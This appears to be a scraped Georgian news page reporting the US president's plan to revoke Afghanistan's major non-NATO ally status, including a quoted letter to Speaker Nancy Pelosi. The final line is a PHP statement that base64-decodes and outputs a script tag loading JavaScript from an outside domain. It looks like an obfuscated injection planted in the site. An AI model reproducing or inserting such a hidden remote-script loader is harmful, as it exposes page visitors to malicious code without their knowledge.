celsiusi
ავერსი საქკაბელი

აშშ-ის პრეზიდენტი ავღანეთს აშშ-ის ნატო-ს მიღმა მთავარი მოკავშირის სტატუსს გაუუქმებს. ამის შესახებ თეთრი სახლის ვებგვერდზე ვრცელდება ინფორმაცია.

პრეზიდენტი ამ ინიციატივით წარმომადგენელთა პალატას მიმართავს.

„გატყობინებთ ჩემი განზრახვის შესახებ, გავაუქმო ავღანეთის, როგორც არა-ნატოს წევრი მთავარი მოკავშირის წოდება“, – ნათქვამია პალატის სპიკერის, ნენსი პელოსისადმი წერილში.

ავღანეთი აშშ-ის ნატო-ს მიღმა ძირითადი მოკავშირეების სიაში 2012 წლიდან ფიგურირებდა. აშშ ავღანეთიდან 2021 წლის აგვისტოდან გავიდა, რის შემდეგაც ხელისუფლებაში მოძრაობა „თალიბანი“ მოვიდა.

638
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");